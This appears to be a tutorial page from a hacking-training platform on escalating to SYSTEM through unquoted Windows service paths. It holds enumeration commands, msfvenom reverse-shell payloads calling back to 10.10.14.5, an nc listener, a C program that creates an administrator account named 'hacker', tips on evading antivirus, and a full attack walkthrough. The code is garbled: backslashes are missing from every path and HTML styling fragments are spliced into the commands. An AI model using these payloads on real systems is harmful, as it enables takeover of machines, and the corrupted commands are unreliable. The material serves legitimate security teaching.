Unquoted Service Paths

intermediate30 minWriteup

Exploiting unquoted service path vulnerabilities

Learning Objectives

  • Identify unquoted paths
  • Find writable directories
  • Create malicious executables
  • Restart services

Unquoted service paths are a classic Windows privilege escalation vector. When a service path contains spaces and isn't enclosed in quotes, Windows searches for executables in a predictable order. Place a malicious binary in the right spot, and it runs as SYSTEM when the service starts.

Think of it like a GPS giving ambiguous directions: "Go to Main Street Coffee Shop". Should you go to Main Street, or Main Street Coffee Shop? Windows has the same confusion - and we can exploit it.

Why It Works

Windows CreateProcess API interprets spaces as argument separators unless paths are quoted. It tries each interpretation until it finds an executable or runs out of options.

Understanding the Vulnerability

1Example Vulnerable Service Path:
2C:Program FilesVendor NameApp Folderservice.exe
3 
4Windows parsing (unquoted):
51. Try: C:Program.exe
62. Try: C:Program FilesVendor.exe
73. Try: C:Program FilesVendor NameApp.exe
84. Try: C:Program FilesVendor NameApp Folderservice.exe
9 
10If we can write to ANY of those locations:
11├── C:Program.exe              (rarely writable)
12├── C:Program FilesVendor.exe (rarely writable)
13└── C:Program FilesVendor NameApp.exe (sometimes writable!)
14 
15Safe (quoted) service path:
16606070;">#a5d6ff;">"C:Program FilesVendor NameApp Folderservice.exe"
17→ Windows takes the whole path as-is, no ambiguity

Why Third-Party Apps Are Vulnerable

1Common Vulnerability Patterns:
2├── Third-party installers often don't quote paths
3├── Custom enterprise software is frequently vulnerable
4├── Older software rarely quotes paths properly
5└── Default Windows services are usually quoted (safe)
6 
7Where to Focus:
8├── C:Program Files[Vendor Name]    ← Spaces in vendor name
9├── C:Program Files (x86)[Vendor]   ← 32-bit apps
10└── C:[Custom Install Path]          ← Custom installations

Finding Unquoted Paths

batch
1REM Find unquoted paths with spaces (CMD)
2wmic service get name,displayname,pathname,startmode | findstr /i 606070;">#a5d6ff;">"auto" | findstr /i /v "c:windows\" | findstr /i /v """
3 
4REM Breakdown:
5REM findstr /i 606070;">#a5d6ff;">"auto"           = Only AUTO_START services
6REM findstr /i /v 606070;">#a5d6ff;">"c:windows"  = Exclude Windows directory
7REM findstr /i /v 606070;">#a5d6ff;">"""           = Exclude paths with quotes
8 
9REM Manual check specific service
10sc qc 606070;">#a5d6ff;">"Vulnerable Service"
11 
12REM PowerShell method
13Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike 606070;">#a5d6ff;">'"*' -and $_.PathName -like "* *"}

PowerUp Automation

powershell
1606070;"># Using PowerUp
2Import-Module .PowerUp.ps1
3 
4606070;"># Find unquoted service paths
5Get-UnquotedService
6 
7606070;"># Output example:
8606070;"># ServiceName    : VulnerableService
9606070;"># Path           : C:Program FilesVendor NameAppservice.exe
10606070;"># ModifiablePath : C:Program FilesVendor Name# StartName      : LocalSystem
11606070;"># AbuseFunction  : Write-ServiceBinary -Name 'VulnerableService' -Path ...
12 
13606070;"># This tells you exactly where to place your malicious binary

Checking Directory Writability

batch
1REM Found unquoted path: C:Program FilesVendor NameApp Folderservice.exe
2REM Check each potential hijack location:
3 
4icacls 606070;">#a5d6ff;">"C:Program FilesVendor Name"
5REM Look for: BUILTINUsers:(W) or (M) or (F)
6REM           Authenticated Users:(W)
7REM           Everyone:(W)
8 
9icacls 606070;">#a5d6ff;">"C:Program FilesVendor NameApp Folder"
10icacls 606070;">#a5d6ff;">"C:"
11 
12REM Using accesschk
13accesschk.exe -dqv 606070;">#a5d6ff;">"C:Program FilesVendor Name"
14accesschk.exe -wud 606070;">#a5d6ff;">"C:Program Files"
15 
16REM Check where you CAN write
17REM Hijack location must be BEFORE the actual service.exe in path order
18 
19REM Example:
20REM Path: C:Program FilesMy AppSub Dirservice.exe
21REM Can write to: C:Program FilesMy AppREM Hijack file: C:Program FilesMy AppSub.exe

Check All Locations

Check every directory in the path, not just the first one. Often the parent directory of the service folder is writable even when Program Files root isn't.

Exploitation

batch
1REM Scenario: Service path is C:Program FilesVulnerable Appservice.exe
2REM We can write to: C:Program FilesVulnerable App
3REM Step 1: Create malicious executable
4REM On attack machine:
5msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o App.exe
6 
7REM Transfer to target
8 
9REM Step 2: Place in vulnerable location
10copy App.exe 606070;">#a5d6ff;">"C:Program FilesVulnerable.exe"
11REM Or if we can write to the folder:
12copy App.exe 606070;">#a5d6ff;">"C:Program FilesVulnerable AppSub.exe"
13 
14REM Step 3: Start listener
15nc -lvnp 4444
16 
17REM Step 4: Restart service (if we have permission)
18sc stop 606070;">#a5d6ff;">"Vulnerable App"
19sc start 606070;">#a5d6ff;">"Vulnerable App"
20 
21REM Or wait for service restart/system reboot

Alternative Payloads

batch
1REM Simple user-adding payload (no reverse shell needed)
2REM On attack machine, create add_admin.c:
3606070;">#include <stdlib.h>
4int main() {
5    system(606070;">#a5d6ff;">"net user hacker Password123! /add");
6    system(606070;">#a5d6ff;">"net localgroup Administrators hacker /add");
7    return 0;
8}
9REM Compile: x86_64-w64-mingw32-gcc add_admin.c -o evil.exe
10 
11REM Using msfvenom to add user
12msfvenom -p windows/adduser USER=hacker PASS=Password123! -f exe > evil.exe
13 
14REM Using PowerUp's Write-ServiceBinary
15Import-Module PowerUp.ps1
16Write-ServiceBinary -Name 606070;">#a5d6ff;">'VulnerableService' -Path 'C:Program FilesVulnerable.exe' -UserName 'hacker' -Password 'Password123!'

Anti-Virus Detection

msfvenom payloads are often detected by AV. Consider obfuscation, custom compilation, or using the add-user approach which is less flagged than reverse shells.

Triggering the Exploit

batch
1REM Method 1: Restart the service (needs permission)
2sc stop 606070;">#a5d6ff;">"Vulnerable Service"
3sc start 606070;">#a5d6ff;">"Vulnerable Service"
4 
5REM Check if we can restart
6accesschk.exe -ucqv 606070;">#a5d6ff;">"Vulnerable Service"
7REM Need: SERVICE_START and SERVICE_STOP
8 
9REM Method 2: Restart the computer (needs SeShutdownPrivilege)
10shutdown /r /t 0
11 
12REM Method 3: Wait for scheduled task/auto-restart
13REM Some services auto-restart on failure
14REM Check: sc qfailure 606070;">#a5d6ff;">"ServiceName"
15 
16REM Method 4: Wait for system reboot (patience)
17REM Services set to AUTO_START will run on boot
18 
19REM Method 5: Crash the service to trigger restart
20REM If service has restart-on-failure policy

Complete Attack Walkthrough

batch
1REM === Complete Unquoted Service Path Attack ===
2 
3REM 1. Find vulnerable service
4wmic service get name,pathname,startmode | findstr /i 606070;">#a5d6ff;">"auto" | findstr /i /v """
5REM Found: MyBackup  C:Program FilesMy Backup Serviceackupsvc.exe  Auto
6 
7REM 2. Verify it's unquoted and runs as SYSTEM
8sc qc MyBackup
9REM BINARY_PATH_NAME: C:Program FilesMy Backup Serviceackupsvc.exe
10REM SERVICE_START_NAME: LocalSystem  ← Runs as SYSTEM!
11 
12REM 3. Check where we can write
13icacls 606070;">#a5d6ff;">"C:Program FilesMy Backup Service"
14REM C:Program FilesMy Backup Service BUILTINUsers:(OI)(CI)(M)
15REM We can write here!
16 
17REM 4. Determine hijack filename
18REM Path ends in 606070;">#a5d6ff;">"backupsvc.exe" so Windows will try:
19REM C:Program.exe
20REM C:Program FilesMy.exe
21REM C:Program FilesMy Backup.exe  ← This is in writable folder!
22REM C:Program FilesMy Backup Serviceackupsvc.exe
23 
24REM 5. Create payload
25msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o Backup.exe
26 
27REM 6. Transfer and place payload
28copy Backup.exe 606070;">#a5d6ff;">"C:Program FilesMy Backup.exe"
29 
30REM 7. Start listener on attack machine
31nc -lvnp 4444
32 
33REM 8. Restart service
34sc stop MyBackup
35sc start MyBackup
36 
37REM 9. Catch SYSTEM shell on listener!

Exploitation Methodology

Unquoted Path Exploitation

1
Findwmic query for unquoted paths with spaces
2
VerifyConfirm service runs as SYSTEM
3
Check Dirsicacls on each directory in path
4
Determine NameWork out what .exe filename to use
5
PayloadCreate malicious executable
6
PlaceCopy to writable location
7
TriggerRestart service or wait for reboot

Knowledge Check

Quick Quiz
Question 1 of 3

For path 'C:\\Program Files\\My App\\Sub Dir\\svc.exe', which executable is tried first?

Challenges

Exploit Unquoted Path

Challenge
🔥 intermediate

Find a service with an unquoted path containing spaces, create a malicious binary, and achieve code execution as SYSTEM.

Need a hint? (4 available)

Key Takeaways

  • Unquoted paths with spaces = Windows searches multiple locations
  • Focus on third-party software, not Windows services
  • Check ALL directories in the path for write access
  • Filename must match what Windows would search for
  • Service must run as LocalSystem for SYSTEM privileges
  • Need to restart service or wait for reboot to trigger